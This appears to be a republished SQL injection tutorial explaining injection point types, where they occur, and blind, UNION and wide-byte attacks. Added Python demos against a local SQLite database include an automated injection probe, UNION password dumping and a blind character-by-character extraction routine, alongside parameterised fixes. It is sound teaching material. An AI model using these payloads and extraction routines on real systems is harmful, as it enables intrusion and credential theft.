
What is the principle of sql injection?

2025-01-30 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article mainly introduces the principle of SQL injection. It is intended as reference material for interested readers, and I hope you learn something from it; let the editor take you through it below.

1. First, understand the principle of SQL injection:

SQL injection: SQL commands are inserted into the input of a Web form, or into the query string of a URL or page request, so that the server is deceived into executing SQL the developer never intended.

More specifically, the attacker uses an existing application to get (malicious) SQL commands executed by the back-end database engine: SQL statements typed into a Web form reach a database behind a site that has this weakness and are executed there, rather than only the statements the designer intended. For example, many earlier film and television websites leaked VIP members' passwords mostly through query strings submitted from WEB forms, which are particularly vulnerable to SQL injection attacks. (From Baidu)

In other words: a website page contains a part that interacts with the database (for example the search function of a news site). Data entered on the website is assembled into a statement and passed to the database for execution. If the site's developers do not safely handle that data on its way to the database (filtering special characters, encoding, and above all binding it as a parameter instead of splicing it into the SQL text), an attacker can pass malicious input (that is, input containing illegal SQL statements) through the site's front end into the database, where those statements run for the attacker's purposes and lead to leakage, damage and other consequences for the database.

2. General classification of SQL injection

Classification by injection point type

(1) Digital injection point

Many web links have a structure like http://www.example.com/12.php?id=1. Injection based on this form is generally called a numeric injection point, because the injected parameter, id, is numeric. Most pages such as viewing a user's profile or viewing an article pass an id like this to the back end, which queries the corresponding record in the database and returns it to the front end. The prototype of the SQL statement is roughly select * from table_name where id=1. If the point is injectable, we can construct an injection statement along the lines of select * from table_name where id=1 and 1=1 to probe it (and compare the result against and 1=2).

(2) character injection point

Web page links like http://xwww.example.com/users.php?user=admin have a character-type injection parameter, user, so this is called a character injection point. The prototype of the SQL statement is roughly select * from table_name where user='admin'. Note that, unlike the numeric prototype, the value is wrapped in quotation marks, which may be single or double. If the point is injectable, we can construct a statement like select * from table_name where user='admin' and 1=1 #', where the # (a MySQL comment marker) discards the quotation mark the application appends after our input; the payload has to get rid of these annoying quotes one way or another.

(3) search type injection point

This is a special type of injection. It means the search parameter is not filtered when data is searched. Generally there is a keyword=... parameter in the link address, and sometimes it is not shown in the link address at all but submitted directly through the search box form. The prototype of the SQL statement at this kind of injection point is roughly select * from table_name where field like '%keyword%'. If it is injectable, we can construct a statement such as select * from table_name where field like '%test%' and '%1%'='%1%' to probe it; the payload itself is test%' and '%1%'='%1, and the application supplies the surrounding '% and %' pieces.
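The three injection point shapes above, as an added example that is not part of the original article: each query is built the unsafe way (string concatenation) and the safe way (bound parameters) and run against an in-memory SQLite database. The table and column names (articles, users, title, user, password) and the sample rows are made up for the demo, and SQLite comments with -- where the MySQL payload in the text uses #.

```python
"""Added example (not part of the original article): the three injection-point
shapes from section 2, each built the unsafe way (string concatenation) and
the safe way (bound parameters), run against an in-memory SQLite database.
Table and column names (articles, users, title, user, password) and the rows
are invented. SQLite comments with '--' where the article's MySQL uses '#'."""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT);
        INSERT INTO articles VALUES (1, 'hello world'), (2, 'test post'), (3, 'other');
        CREATE TABLE users(id INTEGER, user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'alice', 'hunter2');
    """)
    return con


# (1) numeric injection point: ?id=1  ->  WHERE id=1  (no quotes around the value)
def article_unsafe(con, id_param):
    sql = "SELECT title FROM articles WHERE id=" + id_param
    return [r[0] for r in con.execute(sql)]


# (2) character injection point: ?user=admin  ->  WHERE user='admin'
def password_unsafe(con, user_param):
    sql = "SELECT password FROM users WHERE user='" + user_param + "'"
    return [r[0] for r in con.execute(sql)]


# (3) search injection point: keyword=test  ->  WHERE title LIKE '%test%'
def search_unsafe(con, keyword):
    sql = "SELECT title FROM articles WHERE title LIKE '%" + keyword + "%'"
    return [r[0] for r in con.execute(sql)]


# The fix is the same for all three: never splice the value into the SQL text.
# A bound parameter reaches the engine as data, so quotes, 'and', 'or' and
# comment markers inside it cannot change the structure of the statement.
def article_safe(con, id_param):
    if not id_param.isdigit():  # a numeric point should only ever receive digits
        return []
    return [r[0] for r in con.execute("SELECT title FROM articles WHERE id=?", (int(id_param),))]


def password_safe(con, user_param):
    return [r[0] for r in con.execute("SELECT password FROM users WHERE user=?", (user_param,))]


def search_safe(con, keyword):
    pattern = "%" + keyword + "%"  # wildcards are added to the value, not to the SQL
    return [r[0] for r in con.execute("SELECT title FROM articles WHERE title LIKE ?", (pattern,))]


if __name__ == "__main__":
    con = make_db()
    # numeric: 'and 1=1' keeps the row, 'and 1=2' removes it, 'or 1=1' dumps the table
    print(article_unsafe(con, "1 and 1=1"), article_unsafe(con, "1 and 1=2"), article_unsafe(con, "1 or 1=1"))
    # character: the leading quote closes the string, '--' comments out the trailing quote
    print(password_unsafe(con, "admin' and 1=1 --"), password_unsafe(con, "admin' or '1'='1"))
    # search: '%test%' and '%1%'='%1%' is true for every row matching the keyword
    print(search_unsafe(con, "test%' and '%1%'='%1"), search_unsafe(con, "test%' and '%1%'='%2"))
    # the same payloads achieve nothing against the parameterised versions
    print(article_safe(con, "1 and 1=1"), password_safe(con, "admin' or '1'='1"), search_safe(con, "test%' and '%1%'='%1"))
```

The payload for the character point, admin' or '1'='1, returns every user's password because the injected condition is evaluated as SQL; passed to password_safe it is just a user name nobody has, so the query returns nothing.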

3. How to judge whether there is SQL injection (beginner's summary, for reference only)

To put it simply:

All inputs may trigger SQL injection as long as they interact with the database.

By submission method, SQL injection can be divided into:

(1) GET injection: the data is submitted by GET, and the injection point is in a GET parameter. For example, in the link http://xxx.com/news.php?id=1, id is the injection point.

(2) POST injection: the data is submitted by POST, and the injection point is in the POST body; this commonly occurs in forms.

(3) Cookie injection: the client's Cookie is sent with the HTTP request, and the injection point is a field inside the Cookie.

(4) HTTP header injection: the injection point is a field in the HTTP request headers, for example the User-Agent field. Strictly speaking, Cookie injection is a form of header injection, because the Cookie is itself a header field of the HTTP request.

Sorted by submission method, you will find that SQL injection most often occurs in the link address (URL parameters), the submitted data, cookie values and HTTP request headers.

Knowing where SQL injection may exist, we need to determine whether it can be triggered at those locations. The easiest way is to enter an and 1=1 injection (and its variations, such as and 1=2) at the corresponding location and compare the responses: if the and 1=1 page looks like the normal page and the and 1=2 page differs, the condition reached the database. A closing single quotation mark is required for character-type injection points, but not for numeric ones.
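The check described in this section, as an added example that is not part of the original article: a toy request handler with injection points in the GET query, the POST body, a Cookie value and an HTTP header (plus one correctly parameterised field that must not be flagged), and a probe that applies the and 1=1 / and 1=2 pair, with and without a closing quote, to every field of a request and reports those where the true case matches the baseline page and the false case changes it. The tables, parameter names, the X-Lang header and the sample request are all invented.

```python
"""Added example (not part of the original article): a toy server with several
request locations concatenated into SQL, and a probe that applies the
article's 'and 1=1' / 'and 1=2' test to each of them. Tables, parameter
names, the X-Lang header and the sample request are constructed for the demo."""
import sqlite3
from copy import deepcopy
from functools import partial


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, user TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin@example.test'), (2, 'alice', 'alice@example.test');
        CREATE TABLE banners(lang TEXT, text TEXT);
        INSERT INTO banners VALUES ('en', 'Welcome'), ('zh', '欢迎');
    """)
    return con


def vulnerable_app(con, req):
    """Server side. Every field except query['who'] is spliced into SQL text.
    Returns the rendered page, or 'ERROR' when the database rejects a query."""
    q, b, c, h = req["query"], req["body"], req["cookies"], req["headers"]
    rows = []
    try:
        if "id" in q:       # GET parameter, numeric point
            rows += con.execute("SELECT user FROM users WHERE id=" + q["id"]).fetchall()
        if "who" in q:      # GET parameter, character value, but bound: safe
            rows += con.execute("SELECT user FROM users WHERE user=?", (q["who"],)).fetchall()
        if "user" in b:     # POST body, character point
            rows += con.execute("SELECT email FROM users WHERE user='" + b["user"] + "'").fetchall()
        if "uid" in c:      # Cookie value, numeric point
            rows += con.execute("SELECT email FROM users WHERE id=" + c["uid"]).fetchall()
        if "X-Lang" in h:   # HTTP request header, character point
            rows += con.execute("SELECT text FROM banners WHERE lang='" + h["X-Lang"] + "'").fetchall()
    except sqlite3.Error:
        return "ERROR"
    return "\n".join(r[0] for r in rows)


# true/false payload pairs; the character pair closes the quote the app adds
PAYLOADS = {
    "numeric":   ("{v} and 1=1", "{v} and 1=2"),
    "character": ("{v}' and '1'='1", "{v}' and '1'='2"),
}


def with_param(req, location, name, value):
    r = deepcopy(req)
    r[location][name] = value
    return r


def probe(app, base_req):
    """Return (location, name, kind) for every field that behaves like an injection point."""
    baseline = app(base_req)
    findings = []
    for location in ("query", "body", "cookies", "headers"):
        for name, value in base_req[location].items():
            for kind, (true_tpl, false_tpl) in PAYLOADS.items():
                true_page = app(with_param(base_req, location, name, true_tpl.format(v=value)))
                false_page = app(with_param(base_req, location, name, false_tpl.format(v=value)))
                # true case indistinguishable from normal while the false case changes
                # the page: the condition reached the database and was evaluated there
                if true_page == baseline and false_page not in (baseline, "ERROR"):
                    findings.append((location, name, kind))
    return findings


BASE_REQUEST = {  # constructed sample request with a valid value in every location
    "query": {"id": "1", "who": "alice"},
    "body": {"user": "admin"},
    "cookies": {"uid": "2"},
    "headers": {"X-Lang": "en"},
}


def run_probe():
    con = make_db()
    return probe(partial(vulnerable_app, con), BASE_REQUEST)


if __name__ == "__main__":
    for location, name, kind in run_probe():
        print(f"{location}[{name}]: {kind} injection point")
```

The type-mismatched payloads are rejected by the comparison on their own: a quoted payload in a numeric field produces an unterminated string and therefore a database error, and a bare and 1=1 inside a quoted field is just a user name that matches nothing, so neither reproduces the baseline page. Against a real site the baseline must be stable between requests (no timestamps, counters or rotating ads in the compared region), or the comparison has to be restricted to the part of the page that carries the query result.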

4. Advanced classification of SQL injection (classified by execution effect)

(1) Boolean-based blind injection: whether the injected condition is true or false can be judged from the returned page.

(2) Time-based blind injection: nothing can be judged from the page content itself, so a conditional statement is combined with a delay function, and whether the condition held is read from whether the response time increased.

(3) Error-based injection: the page returns a database error message, or the result of the injected statement is shown directly on the page.

(4) UNION query injection: a union select can be used to append the attacker's own query results to the page.

(5) Stacked query injection: multiple statements, separated by semicolons, can be injected at once.

(6) Wide-byte injection: GBK is a multi-byte encoding in which two bytes represent one Chinese character. If the application escapes quotation marks byte by byte but the database decodes the input as GBK, the escaping backslash (0x5C) can be swallowed as the second byte of a two-byte character, leaving the quotation mark live.
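Three of the classes above, as an added example that is not part of the original article: UNION-based extraction, Boolean-based blind extraction of a string one character at a time through a page that only reveals true or false, and the wide-byte effect shown on the raw bytes. The numeric id= point from earlier in the article is reused; the table and column names (articles, users, password) and the rows are invented, and SQLite has no GBK connection encoding, so the wide-byte case is demonstrated by decoding the escaped bytes directly.

```python
"""Added example (not part of the original article): UNION-based, Boolean-based
blind and wide-byte effects against an in-memory SQLite database. Tables,
columns and rows are invented; the wide-byte case is shown on bytes only."""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT);
        INSERT INTO articles VALUES (1, 'hello world'), (2, 'test post');
        CREATE TABLE users(id INTEGER, user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'alice', 'hunter2');
    """)
    return con


def page(con, id_param):
    """The vulnerable endpoint: returns the article titles the query matched."""
    return [r[0] for r in con.execute("SELECT title FROM articles WHERE id=" + id_param)]


# --- UNION-based: the injected SELECT's rows are rendered directly on the page
def union_dump(con, inner_select):
    # id=-1 matches nothing, so only the UNIONed rows come back;
    # the injected SELECT must return the same number of columns (here 1)
    return sorted(page(con, "-1 union all " + inner_select))


# --- Boolean-based blind: the page shows article 1 only when the whole WHERE
#     clause is true, so every request leaks exactly one bit of information
def oracle(con, condition):
    return len(page(con, "1 and (" + condition + ")")) == 1


def blind_extract(con, scalar_select, max_len=64):
    """Recover the string returned by scalar_select one character at a time.
    Assumes printable ASCII (code points 32..126); about 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(con, f"length(({scalar_select}))>={pos}"):
            break  # no character at this position: the string is complete
        lo, hi = 32, 126
        while lo < hi:  # binary search on the code point of character `pos`
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({scalar_select}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


# --- Wide-byte: escaping done byte-wise, decoding done as GBK
def gbk_after_escaping(raw: bytes) -> str:
    escaped = raw.replace(b"'", b"\\'")  # addslashes-style: ' becomes \'
    # The database reads the bytes as GBK. 0xBF 0x5C (backslash is 0x5C) is
    # one valid two-byte character, so the backslash is swallowed into it and
    # the quotation mark that follows is a live string delimiter again.
    return escaped.decode("gbk")


if __name__ == "__main__":
    con = make_db()
    print(union_dump(con, "select user || ':' || password from users"))
    print(blind_extract(con, "SELECT password FROM users WHERE user='admin'"))
    print(repr(gbk_after_escaping(b"\xbf'")), repr(gbk_after_escaping(b"a'")))
```

The blind routine is the slow path a practitioner falls back to when the page renders nothing but a present/absent article; with the UNION point available the same password comes back in a single request. The wide-byte function shows why escaping must happen in the same character set the database will use to decode the statement: with an ASCII first byte the backslash survives, with 0xBF it does not.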

Thank you for reading this article carefully. I hope the article "What is the principle of SQL injection" shared by the editor is helpful to you, and that you will continue to support us and follow the industry information channel. More related knowledge is waiting for you!


© 2024 shulou.com SLNews company. All rights reserved.
